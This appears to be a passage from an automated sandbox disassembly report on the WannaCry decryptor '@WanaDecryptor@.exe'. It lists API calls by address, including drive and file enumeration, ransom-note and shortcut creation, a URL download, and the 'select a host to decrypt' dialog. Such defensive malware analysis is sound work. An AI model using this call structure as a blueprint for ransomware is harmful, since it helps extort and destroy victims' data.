    • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
    • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
    • GetSysColor.USER32 ref: 0040861D
    • GetSysColor.USER32(00000009), ref: 00408624
    • GetSysColor.USER32(00000012), ref: 0040862B
    • GetSysColor.USER32(00000002), ref: 00408632
    • SystemParametersInfoA.USER32(00001008,00000000,00000000,00000000), ref: 0040864A
    • GetSysColor.USER32(0000001B), ref: 0040865C
    • #6140.MFC42(00000002,000000FF), ref: 00408667
    APIs
    • CreateProcessA.KERNEL32 ref: 00401AE3
    • WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
    • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
    • GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
    • CloseHandle.KERNEL32(?), ref: 00401B31
    • CloseHandle.KERNEL32(?), ref: 00401B38
    APIs
    • #4710.MFC42 ref: 00401145
    • SendMessageA.USER32(?,00000404,00000001,00000000), ref: 00401160
    • SendMessageA.USER32(?,00000401,00000000,00280000), ref: 00401175
    • #537.MFC42(Connecting to server...), ref: 0040118D
      • Part of subcall function 00401970: #3092.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 00401997
      • Part of subcall function 00401970: #6199.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 0040199E
      • Part of subcall function 00401970: #800.MFC42(00000406,?,00000000,004134D8,000000FF,00401199,Connecting to server...), ref: 004019AF
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004011B3
    • CreateThread.KERNEL32(00000000,00000000,004012D0,?,00000000,00000000), ref: 004011D1
    Strings
    • Connecting to server..., xrefs: 00401188
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B3D9
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B3E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B4D8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B4E8
      • Part of subcall function 0040ADC0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040ADD9
      • Part of subcall function 0040ADC0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040ADE9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B5A5
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B5B5
      • Part of subcall function 0040B0C0: ??0exception@@QAE@ABQBD@Z.MSVCRT(004213A8), ref: 0040B0D9
      • Part of subcall function 0040B0C0: _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B0E9
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(004213AC), ref: 0040B60B
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040B61B
    APIs
    • OpenClipboard.USER32(?), ref: 00407C38
    • GlobalAlloc.KERNEL32(00000002,?), ref: 00407C4F
    • CloseClipboard.USER32 ref: 00407C5B
    • EmptyClipboard.USER32 ref: 00407C66
    • GlobalLock.KERNEL32(00000000), ref: 00407C79
    • GlobalUnlock.KERNEL32(00000000), ref: 00407C92
    • SetClipboardData.USER32(00000001,00000000), ref: 00407C9B
    • CloseClipboard.USER32 ref: 00407CA1
    APIs
    • ?_Xran@std@@YAXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F6E
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60(?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402F76
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000000), ref: 00402FAD
    • ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI@Z.MSVCP60(?), ref: 00402FBA
    • ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXXZ.MSVCP60 ref: 00402FC2
    • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 00402FF9
    • ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N@Z.MSVCP60(?,00000001,?,00000000,?,?,?,?,00413591,000000FF,00402DE4,00000008,?,?), ref: 0040303A
    APIs
    • fopen.MSVCRT ref: 00407FBD
    • fread.MSVCRT ref: 00407FDD
    • fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    APIs
    • SendMessageA.USER32(?,00000402,00000028,00000000), ref: 00401253
    • KillTimer.USER32(?,000003E9), ref: 0040125E
    • #4853.MFC42 ref: 00401266
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 0040127B
    • SendMessageA.USER32(?,00000405,00000000,00000000), ref: 00401295
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 004012B1
    • #2379.MFC42 ref: 004012C4
    APIs
    • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
    • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
    • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
    • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
    • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
    Strings
    • Please select a host to decrypt., xrefs: 00403885
    APIs
    • GetParent.USER32(?), ref: 004044D2
    • #2864.MFC42(00000000), ref: 004044D9
    • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
    • #2860.MFC42(00000000), ref: 004044EF
    • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
    • CreateFontIndirectA.GDI32(?), ref: 00404513
    • #1641.MFC42(00000000), ref: 0040451D
    APIs
    • ??0exception@@QAE@ABQBD@Z.MSVCRT ref: 0040A16F
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A17F
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1A8
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1B8
    • ??0exception@@QAE@ABQBD@Z.MSVCRT(?), ref: 0040A1E1
    • _CxxThrowException.MSVCRT(?,0041C9C0), ref: 0040A1F1
    APIs
      • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
      • Part of subcall function 0040BED0: GetComputerNameA.KERNEL32(?,?), ref: 0040BFB9
      • Part of subcall function 0040BED0: GetUserNameA.ADVAPI32 ref: 0040BFF5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
    • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
    • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
    • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
    • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
    • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
    • GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
    • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
    • _local_unwind2.MSVCRT ref: 00404A85
    • _local_unwind2.MSVCRT ref: 00404AC7
    APIs
    • #3797.MFC42 ref: 00409C27
    • #6734.MFC42(?,?), ref: 00409C4E
    • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
    • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
    • #4284.MFC42(00000000,00004000,00000000,?,?), ref: 00409CDD
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00409CF0
    APIs
    • #823.MFC42(00000244,?,00000428,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
    • #823.MFC42(?,?,?), ref: 00412849
      • Part of subcall function 00411C00: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,00000000,?,?,00000000,0041289D), ref: 00411C27
      • Part of subcall function 00411C00: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00411C87
    • #825.MFC42(?), ref: 004128B5
    • #825.MFC42(?), ref: 004128CE
    • #825.MFC42(00000000), ref: 004128DD
    • #823.MFC42(00000008), ref: 004128FA
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000428), ref: 0040B793
    • GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
    • DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
    • DeleteFileA.KERNEL32(?), ref: 0040B815
    • DeleteFileA.KERNEL32(?), ref: 0040B82C
      • Part of subcall function 0040B6A0: CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
      • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
      • Part of subcall function 0040B6A0: sprintf.MSVCRT ref: 0040B74E
    APIs
    • OffsetRect.USER32(?,?,?), ref: 00409A9B
    • CreateRectRgn.GDI32(?,?,?,?), ref: 00409AB5
    • #1641.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220), ref: 00409AC0
    • #5781.MFC42(0041679C,00000000), ref: 00409ACC
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409AEB
    • #2414.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00414220,000000FF), ref: 00409B04
    APIs
    • #470.MFC42(?,00000000), ref: 0040433F
    • #5789.MFC42 ref: 00404354
    • #5875.MFC42(00000001), ref: 00404361
    • #6172.MFC42(?,00000001), ref: 0040436E
    • #5789.MFC42(00000000), ref: 0040438F
    • #755.MFC42(00000000), ref: 004043A0
      • Part of subcall function 004044C0: GetParent.USER32(?), ref: 004044D2
      • Part of subcall function 004044C0: #2864.MFC42(00000000), ref: 004044D9
      • Part of subcall function 004044C0: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
      • Part of subcall function 004044C0: #2860.MFC42(00000000), ref: 004044EF
      • Part of subcall function 004044C0: GetObjectA.GDI32(?,0000003C,?), ref: 00404503
      • Part of subcall function 004044C0: CreateFontIndirectA.GDI32(?), ref: 00404513
      • Part of subcall function 004044C0: #1641.MFC42(00000000), ref: 0040451D
    APIs
    • #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
    • #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
    • #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
    • #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
    • #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
    • #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
    APIs
    • GetLogicalDrives.KERNEL32 ref: 00403A35
    • GetDriveTypeW.KERNEL32 ref: 00403A7A
    • GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
      • Part of subcall function 004026B0: swprintf.MSVCRT ref: 00402728
      • Part of subcall function 004026B0: FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
      • Part of subcall function 004026B0: #825.MFC42(?,?,?,?), ref: 0040276F
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 004027A5
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027E1
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004027FB
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
      • Part of subcall function 004026B0: GetFileAttributesW.KERNEL32(?), ref: 00402830
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 0040286E
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028C3
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028DD
      • Part of subcall function 004026B0: wcscmp.MSVCRT ref: 004028F3
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 00402909
      • Part of subcall function 004026B0: wcslen.MSVCRT ref: 00402914
      • Part of subcall function 004026B0: ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 00402923
      • Part of subcall function 004026B0: ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
      • Part of subcall function 004026B0: FindNextFileW.KERNEL32(?,?), ref: 0040296A
      • Part of subcall function 004026B0: FindClose.KERNEL32(?), ref: 0040297D
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 00402A0C
      • Part of subcall function 004026B0: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 00402A2C
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402A6B
      • Part of subcall function 004026B0: #825.MFC42(?), ref: 00402ABF
    APIs
    • #823.MFC42(?), ref: 00406F15
    • SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406F3F
    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000005), ref: 00406F57
    • #825.MFC42(?), ref: 00406F62
    APIs
    • #324.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403109
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403119
    • #567.MFC42(0000008A,?,?,?,?,?,?,004135B3,000000FF), ref: 00403131
    APIs
    • #324.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C68
    • #540.MFC42(00000089,?,?,?,?,?,00413809,000000FF), ref: 00404C7A
    • #860.MFC42(00421798), ref: 00404CAD
    APIs
    • BitBlt.GDI32(?,?,00000001,?,?,00000000,?,00000001,00CC0020), ref: 00408BA7
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BBA
    • #5785.MFC42(?,?,?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BC9
    • #2414.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BEA
    • #640.MFC42(?,?,?,?,?,?,?,?,0041407B,000000FF), ref: 00408BFF
    APIs
    • #289.MFC42 ref: 0040455F
    • #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
    • #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
    • #613.MFC42 ref: 004045BB
    APIs
    • SendMessageA.USER32(?,00000445,00000000,04000000), ref: 00406D2C
    • #353.MFC42(?,00000000,?,?,?,?,?,?,?,?,?,?,0001DAA0), ref: 00406D39
    • SendMessageA.USER32 ref: 00406D69
    • #1979.MFC42 ref: 00406D6F
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 00406DDC
      • Part of subcall function 00406DC0: #823.MFC42(00000001,?,?), ref: 00406DEC
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,0000044B,00000000,?), ref: 00406E1D
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E3E
      • Part of subcall function 00406DC0: _strnicmp.MSVCRT ref: 00406E5A
      • Part of subcall function 00406DC0: SendMessageA.USER32(?,00000437,00000000,?), ref: 00406EA2
      • Part of subcall function 00406DC0: #6136.MFC42 ref: 00406EC4
      • Part of subcall function 00406DC0: #825.MFC42(?), ref: 00406ED7
    • #665.MFC42 ref: 00406D87
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00401000: #324.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401029
      • Part of subcall function 00401000: #567.MFC42(0000008D,?,?,?,?,?,?,00413458,000000FF), ref: 00401039
    • time.MSVCRT ref: 00407DEA
    • #2514.MFC42 ref: 00407E18
    • time.MSVCRT ref: 00407E2A
    • #765.MFC42 ref: 00407E49
    • #641.MFC42 ref: 00407E5D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 004031DF
    • #2414.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403201
    • #616.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403217
    • #693.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403224
    • #641.MFC42(?,?,?,?,?,?,?,00403188), ref: 00403233
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 004049B0: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004049F5
      • Part of subcall function 004049B0: GetFileSize.KERNEL32(00000000,00000000), ref: 00404A0B
      • Part of subcall function 004049B0: GlobalAlloc.KERNEL32(00000000,00000000), ref: 00404A3A
      • Part of subcall function 004049B0: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00404A52
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404A85
      • Part of subcall function 004049B0: _local_unwind2.MSVCRT ref: 00404AC7
    • _local_unwind2.MSVCRT ref: 004048EB
    • strncmp.MSVCRT(00000000,?), ref: 00404951
    • _local_unwind2.MSVCRT ref: 00404964
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • fopen.MSVCRT ref: 00403B17
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000,?), ref: 00402055
      • Part of subcall function 00402020: GlobalAlloc.KERNEL32(00000000,00100000), ref: 0040206D
    • fgets.MSVCRT ref: 00403BD1
      • Part of subcall function 00402650: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000167,00000167), ref: 00402688
    • fclose.MSVCRT ref: 00403C62
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,0001D65A,00000000,00000428), ref: 0040B6B4
    • DeleteFileA.KERNEL32(?), ref: 0040B6D9
    • sprintf.MSVCRT ref: 0040B74E
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
      • Part of subcall function 00412A00: #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
      • Part of subcall function 00412A00: #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
      • Part of subcall function 00412A00: #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Strings
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
      • Part of subcall function 00412A90: malloc.MSVCRT ref: 00412A95
      • Part of subcall function 0040D2B0: memmove.MSVCRT ref: 0040D2E1
    • time.MSVCRT ref: 0040D408
    • Sleep.KERNEL32(00000064), ref: 0040D46B
    • time.MSVCRT ref: 0040D487
    • free.MSVCRT(?), ref: 0040D4A9
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004108FB
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,FFFFFFFF,?,00000000,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041092C
    • #823.MFC42(00000020,?,00411CAF,?,?,FFFFFFFF,?), ref: 0041093A
    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?), ref: 004109A2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 0041234C
      • Part of subcall function 00412250: GetFileAttributesA.KERNEL32(?,?,?), ref: 00412264
      • Part of subcall function 00412250: CreateDirectoryA.KERNEL32(?,00000000), ref: 00412272
    • GetFileAttributesA.KERNEL32(00000000), ref: 00412338
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • _mbscmp.MSVCRT ref: 00405191
    • #860.MFC42(?), ref: 004051A1
    • RedrawWindow.USER32(?,00000000,00000000,00000121), ref: 004051DE
    • InvalidateRect.USER32(?,00000000,00000001), ref: 004051F2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A45
    • #825.MFC42(?,00000000,?,0040B770,00000000), ref: 00412A62
    • #825.MFC42(5D5E5F01,00000000,?,0040B770,00000000), ref: 00412A75
    • #825.MFC42(0040B770,00000000,?,0040B770,00000000), ref: 00412A7E
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • _TrackMouseEvent.COMCTL32(00000010), ref: 00404463
    • #2379.MFC42 ref: 0040446F
    • #2379.MFC42 ref: 004044AA
      • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
      • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
      • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
      • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
      • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
    • SetCursor.USER32(?), ref: 004044A2
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_18_1_400000_@WanaDecryptor@.jbxd
    APIs
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D2C
    • #2414.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D4B
    • #800.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D5E
    • #641.MFC42(?,?,?,?,?,?,?,00404CD8), ref: 00404D6D
    Memory Dump Source
    • Source File: 00000012.00000001.1667276534.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000012.00000001.1667261562.00400000.00000002.sdmp
    • Associated: 00000012.00000001.1667296194.00415000.00000002.sdmp
    • Associated: 00000012.00000001.1667823221.0041F000.00000008.sdmp
    • Associated: 00000012.00000001.1668481800.00422000.00000004.sdmp
    • Associated: 00000012.00000001.1668680404.00423000.00000002.sdmp
